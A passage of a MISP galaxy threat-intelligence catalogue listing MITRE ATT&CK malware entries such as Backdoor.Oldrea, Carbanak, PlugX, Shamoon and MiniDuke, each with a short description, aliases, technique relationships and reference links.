[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)

The tag is: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093"

Backdoor.Oldrea - S0093 is also known as:

  • Backdoor.Oldrea

  • Havex

Backdoor.Oldrea - S0093 has relationships with:

  • similar: misp-galaxy:tool="Havex RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7230. Table References

Links

https://attack.mitre.org/software/S0093

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

Trojan.Karagany - S0094

[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )

The tag is: misp-galaxy:mitre-malware="Trojan.Karagany - S0094"

Trojan.Karagany - S0094 is also known as:

  • Trojan.Karagany

  • xFrost

  • Karagany

Trojan.Karagany - S0094 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 7231. Table References

Links

https://attack.mitre.org/software/S0094

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.dragos.com/threat/dymalloy/

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

macOS.OSAMiner - S1048

[macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021)

The tag is: misp-galaxy:mitre-malware="macOS.OSAMiner - S1048"

macOS.OSAMiner - S1048 is also known as:

  • macOS.OSAMiner

Table 7232. Table References

Links

https://attack.mitre.org/software/S1048

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/

OSX_OCEANLOTUS.D - S0352

[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a macOS backdoor used by [APT32](https://attack.mitre.org/groups/G0050). First discovered in 2015, [APT32](https://attack.mitre.org/groups/G0050) has continued to make improvements using a plugin architecture to extend capabilities, specifically using .dylib files. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can also determine it’s permission level and execute according to access type (root or user).(Citation: Unit42 OceanLotus 2017)(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)

The tag is: misp-galaxy:mitre-malware="OSX_OCEANLOTUS.D - S0352"

OSX_OCEANLOTUS.D - S0352 is also known as:

  • OSX_OCEANLOTUS.D

  • Backdoor.MacOS.OCEANLOTUS.F

Table 7233. Table References

Links

https://attack.mitre.org/software/S0352

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

T9000 - S0098

[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)

The tag is: misp-galaxy:mitre-malware="T9000 - S0098"

T9000 - S0098 is also known as:

  • T9000

T9000 - S0098 has relationships with:

  • similar: misp-galaxy:tool="T9000" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 7235. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

https://attack.mitre.org/software/S0098

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

BS2005 - S0014

[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Mandiant Operation Ke3chang November 2014)

The tag is: misp-galaxy:mitre-malware="BS2005 - S0014"

BS2005 - S0014 is also known as:

  • BS2005

BS2005 - S0014 has relationships with:

  • similar: misp-galaxy:tool="Hoardy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 7236. Table References

Links

https://attack.mitre.org/software/S0014

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

Sys10 - S0060

[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="Sys10 - S0060"

Sys10 - S0060 is also known as:

  • Sys10

Sys10 - S0060 has relationships with:

  • similar: misp-galaxy:malpedia="Sys10" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7237. Table References

Links

https://attack.mitre.org/software/S0060

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Lurid - S0010

[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)

The tag is: misp-galaxy:mitre-malware="Lurid - S0010"

Lurid - S0010 is also known as:

  • Lurid

  • Enfal

Lurid - S0010 has relationships with:

  • similar: misp-galaxy:malpedia="Enfal" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7238. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf

https://attack.mitre.org/software/S0010

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

Dipsind - S0200

[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="Dipsind - S0200"

Dipsind - S0200 is also known as:

  • Dipsind

Dipsind - S0200 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

Table 7239. Table References

Links

https://attack.mitre.org/software/S0200

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

DressCode - S0300

[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)

The tag is: misp-galaxy:mitre-malware="DressCode - S0300"

DressCode - S0300 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 7240. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/

https://attack.mitre.org/software/S0300

Carbanak - S0030

[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)

The tag is: misp-galaxy:mitre-malware="Carbanak - S0030"

Carbanak - S0030 is also known as:

  • Carbanak

  • Anunak

Carbanak - S0030 has relationships with:

  • similar: misp-galaxy:malpedia="Carbanak" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7241. Table References

Links

https://attack.mitre.org/software/S0030

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

RIPTIDE - S0003

[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)

The tag is: misp-galaxy:mitre-malware="RIPTIDE - S0003"

RIPTIDE - S0003 is also known as:

  • RIPTIDE

RIPTIDE - S0003 has relationships with:

  • similar: misp-galaxy:tool="Etumbot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7242. Table References

Links

https://attack.mitre.org/software/S0003

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

TinyZBot - S0004

[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="TinyZBot - S0004"

TinyZBot - S0004 is also known as:

  • TinyZBot

TinyZBot - S0004 has relationships with:

  • similar: misp-galaxy:tool="TinyZBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7243. Table References

Links

https://attack.mitre.org/software/S0004

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

RobbinHood - S0400

[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)

The tag is: misp-galaxy:mitre-malware="RobbinHood - S0400"

RobbinHood - S0400 is also known as:

  • RobbinHood

Table 7244. Table References

Links

https://attack.mitre.org/software/S0400

https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html

https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/

CosmicDuke - S0050

[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CosmicDuke - S0050"

CosmicDuke - S0050 is also known as:

  • CosmicDuke

  • TinyBaron

  • BotgenStudios

  • NemesisGemina

CosmicDuke - S0050 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 7245. Table References

Links

https://attack.mitre.org/software/S0050

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Doki - S0600

[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)

The tag is: misp-galaxy:mitre-malware="Doki - S0600"

Doki - S0600 is also known as:

  • Doki

Table 7246. Table References

Links

https://attack.mitre.org/software/S0600

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

HTTPBrowser - S0070

[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)

The tag is: misp-galaxy:mitre-malware="HTTPBrowser - S0070"

HTTPBrowser - S0070 is also known as:

  • HTTPBrowser

  • Token Control

  • HttpDump

HTTPBrowser - S0070 has relationships with:

  • similar: misp-galaxy:tool="HTTPBrowser" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7247. Table References

Links

https://attack.mitre.org/software/S0070

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Mivast - S0080

[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)

The tag is: misp-galaxy:mitre-malware="Mivast - S0080"

Mivast - S0080 is also known as:

  • Mivast

Mivast - S0080 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7248. Table References

Links

http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2

https://attack.mitre.org/software/S0080

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

Hikit - S0009

[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)

The tag is: misp-galaxy:mitre-malware="Hikit - S0009"

Hikit - S0009 is also known as:

  • Hikit

Hikit - S0009 has relationships with:

  • similar: misp-galaxy:tool="Hikit" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 7249. Table References

Links

https://attack.mitre.org/software/S0009

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

Ngrok - S9000

The tag is: misp-galaxy:mitre-malware="Ngrok - S9000"

Ngrok - S9000 is also known as:

  • Ngrok

Table 7250. Table References

Links

https://attack.mitre.org/software/S9000

Rover - S0090

[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)

The tag is: misp-galaxy:mitre-malware="Rover - S0090"

Rover - S0090 is also known as:

  • Rover

Rover - S0090 has relationships with:

  • similar: misp-galaxy:malpedia="Rover" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 7251. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/

https://attack.mitre.org/software/S0090

Taidoor - S0011

[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)

The tag is: misp-galaxy:mitre-malware="Taidoor - S0011"

Taidoor - S0011 is also known as:

  • Taidoor

Taidoor - S0011 has relationships with:

  • similar: misp-galaxy:tool="Taidoor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7252. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

https://attack.mitre.org/software/S0011

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a

WEBC2 - S0109

[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="WEBC2 - S0109"

WEBC2 - S0109 is also known as:

  • WEBC2

WEBC2 - S0109 has relationships with:

  • similar: misp-galaxy:tool="WEBC2" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 7253. Table References

Links

https://attack.mitre.org/software/S0109

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Derusbi - S0021

[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo)

The tag is: misp-galaxy:mitre-malware="Derusbi - S0021"

Derusbi - S0021 is also known as:

  • Derusbi

  • PHOTO

Derusbi - S0021 has relationships with:

  • similar: misp-galaxy:malpedia="Derusbi (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Derusbi" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7254. Table References

Links

https://attack.mitre.org/software/S0021

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

JPIN - S0201

[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="JPIN - S0201"

JPIN - S0201 is also known as:

  • JPIN

JPIN - S0201 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 7255. Table References

Links

https://attack.mitre.org/software/S0201

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

PoisonIvy - S0012

[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)

The tag is: misp-galaxy:mitre-malware="PoisonIvy - S0012"

PoisonIvy - S0012 is also known as:

  • PoisonIvy

  • Breut

  • Poison Ivy

  • Darkmoon

PoisonIvy - S0012 has relationships with:

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 7256. Table References

Links

https://attack.mitre.org/software/S0012

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign

https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99

Kevin - S1020

[Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021)

The tag is: misp-galaxy:mitre-malware="Kevin - S1020"

Kevin - S1020 is also known as:

  • Kevin

Table 7257. Table References

Links

https://attack.mitre.org/software/S1020

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

Nerex - S0210

[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)

The tag is: misp-galaxy:mitre-malware="Nerex - S0210"

Nerex - S0210 is also known as:

  • Nerex

Nerex - S0210 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7258. Table References

Links

https://attack.mitre.org/software/S0210

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99

BACKSPACE - S0031

[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="BACKSPACE - S0031"

BACKSPACE - S0031 is also known as:

  • BACKSPACE

  • Lecna

BACKSPACE - S0031 has relationships with:

  • similar: misp-galaxy:tool="Backspace" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 7259. Table References

Links

https://attack.mitre.org/software/S0031

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Dendroid - S0301

[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)

The tag is: misp-galaxy:mitre-malware="Dendroid - S0301"

Dendroid - S0301 is also known as:

  • Dendroid

Dendroid - S0301 has relationships with:

  • similar: misp-galaxy:rat="Dendroid" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429" with estimative-language:likelihood-probability="almost-certain"

Table 7260. Table References

Links

https://attack.mitre.org/software/S0301

https://blog.lookout.com/blog/2014/03/06/dendroid/

PlugX - S0013

[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="PlugX - S0013"

PlugX - S0013 is also known as:

  • PlugX

  • Thoper

  • TVT

  • DestroyRAT

  • Sogu

  • Kaba

  • Korplug

PlugX - S0013 has relationships with:

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 7261. Table References

Links

http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

http://labs.lastline.com/an-analysis-of-plugx

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://attack.mitre.org/software/S0013

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Squirrelwaffle - S1030

[Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)

The tag is: misp-galaxy:mitre-malware="Squirrelwaffle - S1030"

Squirrelwaffle - S1030 is also known as:

  • Squirrelwaffle

Table 7262. Table References

Links

https://attack.mitre.org/software/S1030

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

Fysbis - S0410

[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)

The tag is: misp-galaxy:mitre-malware="Fysbis - S0410"

Fysbis - S0410 is also known as:

  • Fysbis

Table 7263. Table References

Links

https://attack.mitre.org/software/S0410

https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Shamoon - S0140

[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

The tag is: misp-galaxy:mitre-malware="Shamoon - S0140"

Shamoon - S0140 is also known as:

  • Shamoon

  • Disttrack

Shamoon - S0140 has relationships with:

  • similar: misp-galaxy:tool="Shamoon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7264. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/software/S0140

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Wiper - S0041

[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)

The tag is: misp-galaxy:mitre-malware="Wiper - S0041"

Wiper - S0041 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 7265. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/

https://attack.mitre.org/software/S0041

MiniDuke - S0051

[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="MiniDuke - S0051"

MiniDuke - S0051 is also known as:

  • MiniDuke

MiniDuke - S0051 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7266. Table References

Links

https://attack.mitre.org/software/S0051

